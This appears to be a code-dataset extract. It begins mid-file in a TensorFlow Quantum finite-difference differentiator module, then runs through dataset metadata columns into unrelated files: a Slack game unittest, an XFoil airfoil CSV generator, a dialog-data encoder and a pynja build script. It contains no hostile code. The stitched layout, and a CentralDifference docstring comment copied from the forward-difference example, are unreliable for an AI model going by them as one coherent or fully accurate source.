tf.cast(non_zero_weights, rearranged_expectations.dtype))
# now add the contribution of a zero term if required
# find any zero terms
mask = tf.equal(self.perturbations, tf.zeros_like(self.perturbations))
zero_weight = tf.boolean_mask(self.weights, mask)
n_zero_perturbations = tf.gather(tf.shape(zero_weight), 0)
# this will have shape [n_symbols, n_programs, n_ops]
partials = tf.cond(
tf.equal(n_zero_perturbations, 0), lambda: nonzero_partials,
lambda: nonzero_partials + tf.multiply(
tf.tile(tf.expand_dims(forward_pass_vals, axis=0),
tf.stack([n_symbols, 1, 1])),
tf.cast(tf.gather(zero_weight, 0), forward_pass_vals.dtype)))
# now apply the chain rule
return tf.einsum('sco,co -> cs', partials, grad)
class ForwardDifference(LinearCombination):
"""Differentiate a circuit using forward differencing.
Forward differencing computes a derivative at a point x using only
points larger than x (in this way, it is 'one sided'). A closed form for
the coefficients of this derivative for an arbitrary positive error order
is used here, which is described in the following article:
https://www.sciencedirect.com/science/article/pii/S0377042799000886.
>>> my_op = tfq.get_expectation_op()
>>> linear_differentiator = tfq.differentiators.ForwardDifference(2, 0.01)
>>> # Get an expectation op, with this differentiator attached.
>>> op = linear_differentiator.generate_differentiable_op(
... analytic_op=my_op
... )
>>> qubit = cirq.GridQubit(0, 0)
>>> circuit = tfq.convert_to_tensor([
... cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('alpha'))
... ])
>>> psums = tfq.convert_to_tensor([[cirq.Z(qubit)]])
>>> symbol_values_array = np.array([[0.123]], dtype=np.float32)
>>> # Calculate tfq gradient.
>>> symbol_values_tensor = tf.convert_to_tensor(symbol_values_array)
>>> with tf.GradientTape() as g:
... g.watch(symbol_values_tensor)
... expectations = op(circuit, ['alpha'], symbol_values_tensor, psums)
>>> # Gradient would be: -50 * f(x + 0.02) + 200 * f(x + 0.01) - 150 * f(x)
>>> grads = g.gradient(expectations, symbol_values_tensor)
>>> grads
tf.Tensor([[-1.184372]], shape=(1, 1), dtype=float32)
"""
def __init__(self, error_order=1, grid_spacing=0.001):
"""Instantiate a ForwardDifference.
Create a ForwardDifference differentiator, passing along an error order
and grid spacing to be used to contstruct differentiator coeffecients.
Args:
error_order: A positive `int` specifying the error order of this
differentiator. This corresponds to the smallest power
of `grid_spacing` remaining in the series that was truncated
to generate this finite differencing expression.
grid_spacing: A positive `float` specifying how large of a
grid to use in calculating this finite difference.
"""
if not (isinstance(error_order, numbers.Integral) and error_order > 0):
raise ValueError("error_order must be a positive integer.")
if not (isinstance(grid_spacing, numbers.Real) and grid_spacing > 0):
raise ValueError("grid_spacing must be a positive real number.")
self.error_order = error_order
self.grid_spacing = grid_spacing
grid_points_to_eval = np.arange(0, error_order + 1)
weights = []
for point in grid_points_to_eval:
if point == 0:
weight = -1 * np.sum(
[1 / j for j in np.arange(1, error_order + 1)])
else:
weight = ((-1) ** (point+1) * np.math.factorial(error_order))/\
(point * np.math.factorial(error_order-point)
* np.math.factorial(point))
weights.append(weight / grid_spacing)
super().__init__(weights, grid_points_to_eval * grid_spacing)
class CentralDifference(LinearCombination):
"""Differentiates a circuit using Central Differencing.
Central differencing computes a derivative at point x using an equal
number of points before and after x. A closed form for
the coefficients of this derivative for an arbitrary positive error order
is used here, which is described in the following article:
https://www.sciencedirect.com/science/article/pii/S0377042799000886.
>>> my_op = tfq.get_expectation_op()
>>> linear_differentiator = tfq.differentiators.CentralDifference(2, 0.01)
>>> # Get an expectation op, with this differentiator attached.
>>> op = linear_differentiator.generate_differentiable_op(
... analytic_op=my_op
... )
>>> qubit = cirq.GridQubit(0, 0)
>>> circuit = tfq.convert_to_tensor([
... cirq.Circuit(cirq.X(qubit) ** sympy.Symbol('alpha'))
... ])
>>> psums = tfq.convert_to_tensor([[cirq.Z(qubit)]])
>>> symbol_values_array = np.array([[0.123]], dtype=np.float32)
>>> # Calculate tfq gradient.
>>> symbol_values_tensor = tf.convert_to_tensor(symbol_values_array)
>>> with tf.GradientTape() as g:
... g.watch(symbol_values_tensor)
... expectations = op(circuit, ['alpha'], symbol_values_tensor, psums)
>>> # Gradient would be: -50 * f(x + 0.02) + 200 * f(x + 0.01) - 150 * f(x)
>>> grads = g.gradient(expectations, symbol_values_tensor)
>>> grads
tf.Tensor([[-1.1837807]], shape=(1, 1), dtype=float32)
"""
def __init__(self, error_order=2, grid_spacing=0.001):
"""Instantiate a CentralDifference.
Create a CentralDifference differentaitor, passing along an error order
and grid spacing to be used to contstruct differentiator coeffecients.
Args:
error_order: A positive, even `int` specifying the error order
of this differentiator. This corresponds to the smallest power
of `grid_spacing` remaining in the series that was truncated
to generate this finite differencing expression.
grid_spacing: A positive `float` specifying how large of a
grid to use in calculating this finite difference.
"""
if not (isinstance(error_order, numbers.Integral) and
error_order > 0 and error_order % 2 == 0):
raise ValueError("error_order must be a positive, even integer.")
if not (isinstance(grid_spacing, numbers.Real) and grid_spacing > 0):
raise ValueError("grid_spacing must be a positive real number.")
grid_points_to_eval = np.concatenate([
np.arange(-1 * error_order / 2, 0),
np.arange(1, error_order / 2 + 1)
])
weights = []
n = error_order / 2
for k in grid_points_to_eval:
numerator = (-1)**(k + 1) * np.math.factorial(n)**2
denom = k * np.math.factorial(n - k) * np.math.factorial(n + k)
weights.append(numerator / (denom * grid_spacing))
super().__init__(weights, grid_points_to_eval * grid_spacing)
| 45.812379
| 80
| 0.609584
| 2,794
| 23,685
| 4.994273
| 0.141016
| 0.017558
| 0.044432
| 0.037624
| 0.8088
| 0.797549
| 0.777053
| 0.768812
| 0.760355
| 0.749176
| 0
| 0.015542
| 0.299134
| 23,685
| 516
| 81
| 45.901163
| 0.82506
| 0.404602
| 0
| 0.723849
| 0
| 0
| 0.040868
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054393
| false
| 0.025105
| 0.016736
| 0.008368
| 0.125523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8e90e672e298127e182eb030542a46c72347765
| 2,423
|
py
|
Python
|
test/game/field_outputter_test.py
|
setokinto/slack-bomber
|
4a9a546fc1fb8966b6eb232f3200d48537abd0b6
|
[
"MIT"
] | 4
|
2016-12-08T02:27:32.000Z
|
2019-02-20T05:55:00.000Z
|
test/game/field_outputter_test.py
|
setokinto/slack-bomber
|
4a9a546fc1fb8966b6eb232f3200d48537abd0b6
|
[
"MIT"
] | 31
|
2016-10-13T10:38:22.000Z
|
2021-07-01T05:27:10.000Z
|
test/game/field_outputter_test.py
|
setokinto/slack-bomber
|
4a9a546fc1fb8966b6eb232f3200d48537abd0b6
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import Mock, patch
from app.game.field_outputter import FieldOutputter
from app.game.field import Field
class FieldOutputterTest(unittest.TestCase):
def setUp(self):
pass
@patch("app.game.field_outputter.slacker")
def test_outputter_send_new_message(self, mocked_slacker):
FieldOutputter.recent_field_ts = {}
mock = Mock()
mock.body = {"ts": "tsvalue"}
mocked_slacker.chat.post_message.return_value = mock
mocked_slacker.chat.update.return_value = None
mocked_slacker.reactions.add.return_value = None
field = Field(10, 8, ["user1", "user2"])
FieldOutputter.post_field("channel",field)
self.assertTrue(mocked_slacker.chat.post_message.called)
self.assertFalse(mocked_slacker.chat.update.called)
@patch("app.game.field_outputter.slacker")
def test_Field_should_edit_in_second_post(self, mocked_slacker):
FieldOutputter.recent_field_ts = {}
mock = Mock()
mock.body = {"ts": "tsvalue"}
mocked_slacker.chat.post_message.return_value = mock
mocked_slacker.chat.update.return_value = None
mocked_slacker.reactions.add.return_value = None
field = Field(10, 8, ["user1", "user2"])
FieldOutputter.post_field("channel", field)
self.assertTrue(mocked_slacker.chat.post_message.called)
self.assertFalse(mocked_slacker.chat.update.called)
FieldOutputter.post_field("channel", field)
self.assertTrue(mocked_slacker.chat.update.called)
@patch("app.game.field_outputter.slacker")
def test_Field_should_post_to_other_channel(self, mocked_slacker):
FieldOutputter.recent_field_ts = {}
mock = Mock()
mock.body = {"ts": "tsvalue"}
mocked_slacker.chat.post_message.return_value = mock
mocked_slacker.chat.update.return_value = None
mocked_slacker.reactions.add.return_value = None
field = Field(11, 15, ["user1", "user2"])
FieldOutputter.post_field("channel", field)
self.assertTrue(mocked_slacker.chat.post_message.called)
self.assertFalse(mocked_slacker.chat.update.called)
mocked_slacker.chat.post_message.called = False
FieldOutputter.post_field("channel2", field)
self.assertTrue(mocked_slacker.chat.post_message.called)
self.assertFalse(mocked_slacker.chat.update.called)
| 42.508772
| 70
| 0.704499
| 291
| 2,423
| 5.62543
| 0.182131
| 0.17471
| 0.166158
| 0.102627
| 0.835675
| 0.835675
| 0.814905
| 0.814905
| 0.79047
| 0.79047
| 0
| 0.008656
| 0.189435
| 2,423
| 56
| 71
| 43.267857
| 0.824847
| 0
| 0
| 0.714286
| 0
| 0
| 0.078035
| 0.039637
| 0
| 0
| 0
| 0
| 0.183673
| 1
| 0.081633
| false
| 0.020408
| 0.081633
| 0
| 0.183673
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8e960c693492a608c8e4eb981c6968863bbab72
| 10,579
|
py
|
Python
|
airfoil_shapes_re_v2/xfoil_analysis_v2.py
|
omersan/PGML
|
09de3472341c05ff929fd8bbeb90ab0595e7eaa4
|
[
"Apache-2.0"
] | 6
|
2020-11-26T02:25:21.000Z
|
2022-01-21T01:55:54.000Z
|
airfoil_shapes_re_v2/xfoil_analysis_v2.py
|
zuokuijun/PGML
|
2b919d65e6467b2afdd9f58b9a72f1d5ec74132f
|
[
"Apache-2.0"
] | null | null | null |
airfoil_shapes_re_v2/xfoil_analysis_v2.py
|
zuokuijun/PGML
|
2b919d65e6467b2afdd9f58b9a72f1d5ec74132f
|
[
"Apache-2.0"
] | 5
|
2020-12-26T05:10:00.000Z
|
2021-12-07T08:05:32.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 4 16:47:31 2020
@author: suraj
"""
import numpy as np
import csv
import os
import matplotlib.pyplot as plt
from xfoil import XFoil
from xfoil.model import Airfoil
#%%
import glob
import os
#os.chdir(r'directory where the files are located')
myFiles = glob.glob('*.txt')
print(myFiles)
naca4_files = []
for file in myFiles:
if len(file[:-4]) == 8:
naca4_files.append(file)
#%%
xf = XFoil()
from xfoil.test import naca0012
xf.airfoil = naca0012
coords = naca0012.coords
xf.Re = 1e6
xf.max_iter = 80
a, cl, cd, cm, cpmin = xf.aseq(-20, 22, 2)
#%%
Re_list = [1e6,2e6,3e6,4e6]
A_list = [0,2,4,6]
B_list = [0,2,4,6]
C_list = [0,1]
D_list = [2,4,6]
if os.path.isfile('train_data_naca4.csv'):
os.remove('train_data_naca4.csv')
for eachfile in naca4_files:
for re in Re_list:
file = eachfile[:-4]
filename = f'{file}.txt'
airfoil_xy = np.loadtxt(filename, skiprows=0)
airfoil_xy = np.flip(airfoil_xy, axis=0)
airfoil_xy = np.round(airfoil_xy,6)
xfc = XFoil()
xfc.airfoil = Airfoil(airfoil_xy[:,0], airfoil_xy[:,1])
xfc.Re = re
xfc.max_iter = 40
ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
angle_counts = ac.shape[0]
list_results = []
list_result = []
for i in range(angle_counts):
list_result.append(file)
list_result.extend(airfoil_xy[:,0])
list_result.extend(airfoil_xy[:,1])
list_result.append(a[i])
list_result.append(ac[i])
list_result.append(re)
list_result.append(clc[i])
list_result.append(cdc[i])
list_result.append(cmc[i])
list_result.append(cpminc[i])
list_results.append(list_result)
list_result = []
for item in list_results:
with open('train_data_naca4.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=",")
writer.writerow(item)
#%%
C_list = [1]
D_list = [0,2,4,6]
if os.path.isfile('train_data_naca210.csv'):
os.remove('train_data_naca210.csv')
for C in C_list:
for D in D_list:
for re in Re_list:
file = f'naca210{C}{D}'
filename = f'{file}.txt'
airfoil_xy = np.loadtxt(filename, skiprows=0)
airfoil_xy = np.flip(airfoil_xy, axis=0)
airfoil_xy = np.round(airfoil_xy,6)
xfc = XFoil()
xfc.airfoil = Airfoil(airfoil_xy[:,0], airfoil_xy[:,1])
xfc.Re = re
xfc.max_iter = 40
ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
angle_counts = ac.shape[0]
list_results = []
list_result = []
for i in range(angle_counts):
list_result.append(file)
list_result.extend(airfoil_xy[:,0].flatten())
list_result.extend(airfoil_xy[:,1])
list_result.append(a[i])
list_result.append(ac[i])
list_result.append(re)
list_result.append(clc[i])
list_result.append(cdc[i])
list_result.append(cmc[i])
list_result.append(cpminc[i])
list_results.append(list_result)
list_result = []
for item in list_results:
with open('train_data_naca210.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=",")
writer.writerow(item)
#%%
if os.path.isfile('train_data_naca220.csv'):
os.remove('train_data_naca220.csv')
for C in C_list:
for D in D_list:
for re in Re_list:
file = f'naca220{C}{D}'
filename = f'{file}.txt'
airfoil_xy = np.loadtxt(filename, skiprows=0)
airfoil_xy = np.flip(airfoil_xy, axis=0)
airfoil_xy = np.round(airfoil_xy,6)
xfc = XFoil()
xfc.airfoil = Airfoil(airfoil_xy[:,0], airfoil_xy[:,1])
xfc.Re = re
xfc.max_iter = 40
ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
angle_counts = ac.shape[0]
list_results = []
list_result = []
for i in range(angle_counts):
list_result.append(file)
list_result.extend(airfoil_xy[:,0].flatten())
list_result.extend(airfoil_xy[:,1])
list_result.append(a[i])
list_result.append(ac[i])
list_result.append(re)
list_result.append(clc[i])
list_result.append(cdc[i])
list_result.append(cmc[i])
list_result.append(cpminc[i])
list_results.append(list_result)
list_result = []
for item in list_results:
with open('train_data_naca220.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=",")
writer.writerow(item)
#%%
if os.path.isfile('train_data_naca230.csv'):
os.remove('train_data_naca230.csv')
for C in C_list:
for D in D_list:
for re in Re_list:
file = f'naca230{C}{D}'
filename = f'{file}.txt'
airfoil_xy = np.loadtxt(filename, skiprows=0)
airfoil_xy = np.flip(airfoil_xy, axis=0)
airfoil_xy = np.round(airfoil_xy,6)
xfc = XFoil()
xfc.airfoil = Airfoil(airfoil_xy[:,0], airfoil_xy[:,1])
xfc.Re = re
xfc.max_iter = 40
ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
angle_counts = ac.shape[0]
list_results = []
list_result = []
for i in range(angle_counts):
list_result.append(file)
list_result.extend(airfoil_xy[:,0].flatten())
list_result.extend(airfoil_xy[:,1])
list_result.append(a[i])
list_result.append(ac[i])
list_result.append(re)
list_result.append(clc[i])
list_result.append(cdc[i])
list_result.append(cmc[i])
list_result.append(cpminc[i])
list_results.append(list_result)
list_result = []
for item in list_results:
with open('train_data_naca230.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=",")
writer.writerow(item)
#%%
if os.path.isfile('train_data_naca240.csv'):
os.remove('train_data_naca240.csv')
for C in C_list:
for D in D_list:
for re in Re_list:
file = f'naca240{C}{D}'
filename = f'{file}.txt'
airfoil_xy = np.loadtxt(filename, skiprows=0)
airfoil_xy = np.flip(airfoil_xy, axis=0)
airfoil_xy = np.round(airfoil_xy,6)
xfc = XFoil()
xfc.airfoil = Airfoil(airfoil_xy[:,0], airfoil_xy[:,1])
xfc.Re = re
xfc.max_iter = 40
ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
angle_counts = ac.shape[0]
list_results = []
list_result = []
for i in range(angle_counts):
list_result.append(file)
list_result.extend(airfoil_xy[:,0].flatten())
list_result.extend(airfoil_xy[:,1])
list_result.append(a[i])
list_result.append(ac[i])
list_result.append(re)
list_result.append(clc[i])
list_result.append(cdc[i])
list_result.append(cmc[i])
list_result.append(cpminc[i])
list_results.append(list_result)
list_result = []
for item in list_results:
with open('train_data_naca240.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=",")
writer.writerow(item)
#%%
if os.path.isfile('train_data_naca250.csv'):
os.remove('train_data_naca250.csv')
for C in C_list:
for D in D_list:
for re in Re_list:
file = f'naca250{C}{D}'
filename = f'{file}.txt'
airfoil_xy = np.loadtxt(filename, skiprows=0)
airfoil_xy = np.flip(airfoil_xy, axis=0)
airfoil_xy = np.round(airfoil_xy,6)
xfc = XFoil()
xfc.airfoil = Airfoil(airfoil_xy[:,0], airfoil_xy[:,1])
xfc.Re = re
xfc.max_iter = 40
ac, clc, cdc, cmc, cpminc = xfc.aseq(-20, 22, 2)
angle_counts = ac.shape[0]
list_results = []
list_result = []
for i in range(angle_counts):
list_result.append(file)
list_result.extend(airfoil_xy[:,0].flatten())
list_result.extend(airfoil_xy[:,1])
list_result.append(a[i])
list_result.append(ac[i])
list_result.append(re)
list_result.append(clc[i])
list_result.append(cdc[i])
list_result.append(cmc[i])
list_result.append(cpminc[i])
list_results.append(list_result)
list_result = []
for item in list_results:
with open('train_data_naca250.csv', 'a') as csvfile:
writer = csv.writer(csvfile, delimiter=",")
writer.writerow(item)
#%%
fig,ax = plt.subplots(1,2, figsize=(12,5))
ax[0].plot(ac, clc, 'ro-', label='Xfoil NACA0012 (N = 201)')
#ax[0].plot(a, cl, 'bo-', label='Xfoil NACA0012')
ax[0].legend()
ax[1].plot(ac, cdc, 'ro-', label='Xfoil NACA0012 (N = 201)')
#ax[1].plot(a, cd, 'bo-', label='Xfoil NACA0012 ')
ax[1].legend()
plt.show()
fig.tight_layout()
#fig.savefig('naca0012_aoa.png', dpi=300)
| 31.864458
| 68
| 0.502978
| 1,297
| 10,579
| 3.922899
| 0.108712
| 0.153302
| 0.150943
| 0.100236
| 0.845126
| 0.808766
| 0.805425
| 0.795204
| 0.795204
| 0.784984
| 0
| 0.039296
| 0.376973
| 10,579
| 332
| 69
| 31.864458
| 0.732666
| 0.028358
| 0
| 0.758197
| 0
| 0
| 0.057126
| 0.03217
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.036885
| 0
| 0.036885
| 0.004098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d0d9119e993b9c0751687fde356593fed17d456
| 11,776
|
py
|
Python
|
DialogFormatReader.py
|
tilde-nlp/pip2-next-dlg-action
|
652a2fc03f78cecc1ad32ce737916da2ff3f1688
|
[
"MIT"
] | null | null | null |
DialogFormatReader.py
|
tilde-nlp/pip2-next-dlg-action
|
652a2fc03f78cecc1ad32ce737916da2ff3f1688
|
[
"MIT"
] | null | null | null |
DialogFormatReader.py
|
tilde-nlp/pip2-next-dlg-action
|
652a2fc03f78cecc1ad32ce737916da2ff3f1688
|
[
"MIT"
] | 1
|
2020-09-30T07:15:35.000Z
|
2020-09-30T07:15:35.000Z
|
import sys
import numpy as np
import pandas as pd
import random
from itertools import chain
np.set_printoptions(edgeitems=30, linewidth=100000)
from Embeddings import Embeddings
def ResetEntitiesInHistory(history, entity):
if entity[0]!='_':
if entity in history:
history.remove(entity)
else:
history[:] = [x for x in history if not x.startswith(entity)]
def normalizeEmotions(dialog_line):
#ar normalizēšanu nepaliek labāk
# dialog_line['valence']= dialog_line['valence']/8.0
# dialog_line['activation']=dialog_line['activation']/8.0
return dialog_line
def readYamlDocs(path, vectorize=False, embobj=None,use_emotion=False):
dialogs = []
from pathlib import Path
from ruamel.yaml import YAML
yaml = YAML(typ='safe',pure=True)
with open(Path(path), 'r',True,'utf-8') as file:
data = file.read().replace('\\"',' ')
results=yaml.load_all(data)
file.close()
#results =yaml.load_all(Path(path)) fails with UnicodeDecodeError for non-latin characters
n=0
for dialog in results:
#n=n+1
#print(str(n))
if(dialog==None or 'botid' in dialog[0]):
continue
prev_entities = []
dialog_lines = []
dialog_line0={}
dialog_line0['entities'] = []
dialog_line0['prev_entities'] = []
dialog_line0['intent'] = []
dialog_line0['actor']='bot'
dialog_line0['action']='_step0_'
dialog_line0['valence']=4.0
dialog_line0['activation']=4.0
#dialog_line0['input_mode']='txt'
dialog_lines.append(normalizeEmotions(dialog_line0))
for line in dialog:
dialog_line={}
dialog_line['entities'] = []
dialog_line['prev_entities'] = prev_entities
dialog_line['intent'] = []
dialog_line['action'] = '-'
dialog_line['valence']=4.0
dialog_line['activation']=4.0
# dialog_line['input_mode']='txt'
if 'entities' in line:
for k, v in line['entities'].items():
if len(str(v))==0:
ResetEntitiesInHistory(prev_entities,str(k))
elif str(k)[0]=='_':
ResetEntitiesInHistory(prev_entities,str(k))
dialog_line['entities'].append(str(k)+str(v).lower())
else:
dialog_line['entities'].append(str(k))
if 'action' in line:
dialog_line['action']=line['action']
if 'actor' in line:
dialog_line['actor']=line['actor']
if line['actor']=='user':
if vectorize==True:
if len(line['utterance'].strip(' \n\t'))>0:
dialog_line['intent'].extend(embobj.getSentenceVector(line['utterance'].strip(' \n\t')))
elif 'intents' in line :
dialog_line['intent']=line['intents']
if 'entities' in dialog_line:
prev_entities=list(set(dialog_line['entities'] + prev_entities))
if use_emotion:
if 'valence' in line:
dialog_line['valence']=float(line['valence'])
if dialog_line['valence']==4.0:
dialog_line['valence']=dialog_line['valence']+random.randrange(-50, 50)/100
if 'activation' in line:
dialog_line['activation']=float(line['activation'])
if dialog_line['activation']==4.0:
dialog_line['activation']=dialog_line['activation']+random.randrange(-50, 50)/100
# if 'input_mode' in line:
# dialog_line['input_mode']=line['input_mode']
dialog_lines.append(normalizeEmotions(dialog_line))
if dialog_lines:
dialogs.append(dialog_lines)
return dialogs
def readJSONBuffer(jsontxt, vectorize=False,embobj=None,use_emotion=False):
dialogs = []
import simplejson as json
#print(jsontxt)
results =json.loads(jsontxt,encoding="utf-8")
prev_entities = []
dialog_lines = []
dialog_line0={}
dialog_line0['entities'] = []
dialog_line0['prev_entities'] = []
dialog_line0['intent'] = []
dialog_line0['actor']='bot'
dialog_line0['action']='_step0_'
dialog_line0['valence']=4.0
dialog_line0['activation']=4.0
#dialog_line0['input_mode']='txt'
dialog_lines.append(normalizeEmotions(dialog_line0))
for line in results:
dialog_line={}
dialog_line['entities'] = []
dialog_line['prev_entities'] = prev_entities
dialog_line['intent'] = []
dialog_line['action'] = '-'
dialog_line['valence']=4.0
dialog_line['activation']=4.0
#dialog_line['input_mode']='txt'
if 'entities' in line:
for k, v in line['entities'].items():
if len(str(v))==0:
ResetEntitiesInHistory(prev_entities,str(k))
elif str(k)[0]=='_':
ResetEntitiesInHistory(prev_entities,str(k))
dialog_line['entities'].append(str(k)+str(v).lower())
else:
dialog_line['entities'].append(str(k))
if 'action' in line:
dialog_line['action']=line['action']
if 'actor' in line:
dialog_line['actor']=line['actor']
if line['actor']=='user':
if vectorize==True:
if len(line['utterance'].strip(' \n\t'))>0:
dialog_line['intent'].extend(embobj.getSentenceVector(line['utterance'].strip(' \n\t')))
elif 'intents' in line :
dialog_line['intent']=line['intents']
if 'entities' in dialog_line:
prev_entities=list(set(dialog_line['entities'] + prev_entities))
if use_emotion:
if 'valence' in line:
dialog_line['valence']=float(line['valence'])
if dialog_line['valence']==4.0:
dialog_line['valence']=dialog_line['valence']+random.randrange(-1, 1)
if 'activation' in line:
dialog_line['activation']=float(line['activation'])
if dialog_line['activation']==4.0:
dialog_line['activation']=dialog_line['activation']+random.randrange(-1, 1)
# if 'input_mode' in line:
# dialog_line['input_mode']=line['input_mode']
dialog_lines.append(normalizeEmotions(dialog_line))
dialogs.append(dialog_lines)
return dialogs
def encodeToNP(dialogs, predCol, vectorize=False, embsize=300):
dfs = [pd.DataFrame(d) for d in dialogs]
for d in dfs:
d.values[d.values==None] = "-"
df = pd.concat(dfs)
isList = {}
uniqueVals = {}
cols = list(df)
totalOffset = 0
offsets = [0] * len(list(df))
for i, col in enumerate(cols):
if col == 'valence' or col == 'activation':
offsets[i]=totalOffset
totalOffset +=1
elif vectorize==False or (vectorize==True and col != 'intent'):
if (df[col].apply(type) == list).any():
isList[col] = True
uniqueVals[col] = np.array(sorted(list(set(df[col].sum()))), dtype="object")
else:
isList[col] = False
vals = df[col].unique()
vals = vals[vals != np.array(None)]
vals.sort()
uniqueVals[col] = vals
offsets[i] = totalOffset
totalOffset += len(uniqueVals[col])
else:
offsets[i]=totalOffset
retval = []
ys = []
totalOffsetSentEmbedd=totalOffset
if vectorize:
totalOffsetSentEmbedd=totalOffsetSentEmbedd+embsize
for d in dfs:
arr = np.zeros(shape=(len(d), totalOffsetSentEmbedd + 1)) # add first dialog marker
y = np.zeros(shape=(len(d), len(uniqueVals[predCol])))
for line in range(len(d)):
for i, col in enumerate(cols):
if col == 'valence' or col == 'activation': #columns that are not one-hot
arr[line, offsets[i]]=d.loc[line, col]
elif vectorize==True and col == 'intent':
idx=0
for val in d.loc[line, col]:
arr[line, totalOffset+idx]=val
idx += 1
else:
if isList[col]:
for val in d.loc[line, col]:
arr[line, offsets[i] + np.where(uniqueVals[col] == val)[0][0]] = 1
else:
arr[line, offsets[i] + np.where(uniqueVals[col] == d.loc[line, col])[0][0]] = 1
if line < len(d)-1:
y[line, np.where(uniqueVals[predCol] == d.loc[line+1, predCol])[0][0]] = 1
else:
y[line, np.where(uniqueVals[predCol] == "-")[0][0]] = 1
arr[0, totalOffset] = 1
retval.append(arr)
ys.append(y)
return retval, ys, uniqueVals
def encodeToNPwithKnownUniqueVals(dialogs, predCol, uniqueVals, vectorize=False, embsize=300):
dfs = [pd.DataFrame(d) for d in dialogs]
for d in dfs:
d.values[d.values == None] = "-"
df = pd.concat(dfs)
isList = {}
cols = list(df)
totalOffset = 0
offsets = [0] * len(list(df))
for i, col in enumerate(cols):
if col == 'valence' or col == 'activation':
offsets[i]=totalOffset
totalOffset +=1
elif vectorize==False or (vectorize==True and col != 'intent'):
if (df[col].apply(type) == list).any():
isList[col] = True
else:
isList[col] = False
offsets[i] = totalOffset
totalOffset += len(uniqueVals[col])
else:
offsets[i]=totalOffset
retval = []
ys = []
totalOffsetSentEmbedd=totalOffset
if vectorize:
totalOffsetSentEmbedd=totalOffsetSentEmbedd+embsize
for d in dfs:
arr = np.zeros(shape=(len(d), totalOffsetSentEmbedd + 1)) # add first dialog marker
y = np.zeros(shape=(len(d), len(uniqueVals[predCol])))
for line in range(len(d)):
for i, col in enumerate(cols):
if col == 'valence' or col == 'activation': #columns that are not one-hot
arr[line, offsets[i]]=d.loc[line, col]
elif vectorize==True and col == 'intent':
idx=0
for val in d.loc[line, col]:
arr[line, totalOffset+idx]=val
idx += 1
else:
if isList[col]:
for val in d.loc[line, col]:
for idx,valunique in enumerate(uniqueVals[col]):
if valunique == val:
arr[line, offsets[i] + idx] = 1
else:
for idx,valunique in enumerate(uniqueVals[col]):
if valunique == d.loc[line, col]:
arr[line, offsets[i] + idx] = 1
if line < len(d)-1:
for idx,valunique in enumerate(uniqueVals[predCol]):
if valunique == d.loc[line+1, predCol]:
y[line, idx] = 1
else:
for idx,valunique in enumerate(uniqueVals[predCol]):
if valunique == "-":
y[line, idx] = 1
arr[0, totalOffset] = 1
retval.append(arr)
ys.append(y)
return retval, ys
def main():
pass
if __name__ == "__main__":
sys.exit(int(main() or 0))
| 35.684848
| 112
| 0.531844
| 1,314
| 11,776
| 4.663623
| 0.134703
| 0.094648
| 0.031984
| 0.031332
| 0.817396
| 0.811521
| 0.787369
| 0.767624
| 0.738087
| 0.700392
| 0
| 0.01672
| 0.334664
| 11,776
| 329
| 113
| 35.793313
| 0.765412
| 0.054603
| 0
| 0.777778
| 0
| 0
| 0.07747
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02682
| false
| 0.003831
| 0.034483
| 0.003831
| 0.08046
| 0.003831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d124a64a602d6bbb9b38ad3963f8db6e64141c1
| 92
|
py
|
Python
|
test2/code/a/a.py
|
fifoforlifo/pynja
|
73c5bc0eec02c7bd5bf0d60856c86dd3abb0e6fe
|
[
"Apache-2.0"
] | null | null | null |
test2/code/a/a.py
|
fifoforlifo/pynja
|
73c5bc0eec02c7bd5bf0d60856c86dd3abb0e6fe
|
[
"Apache-2.0"
] | null | null | null |
test2/code/a/a.py
|
fifoforlifo/pynja
|
73c5bc0eec02c7bd5bf0d60856c86dd3abb0e6fe
|
[
"Apache-2.0"
] | null | null | null |
import pynja
pynja.import_subdir("a0")
pynja.import_subdir("a1")
pynja.import_subdir("a2")
| 15.333333
| 25
| 0.771739
| 14
| 92
| 4.857143
| 0.428571
| 0.485294
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034884
| 0.065217
| 92
| 5
| 26
| 18.4
| 0.755814
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
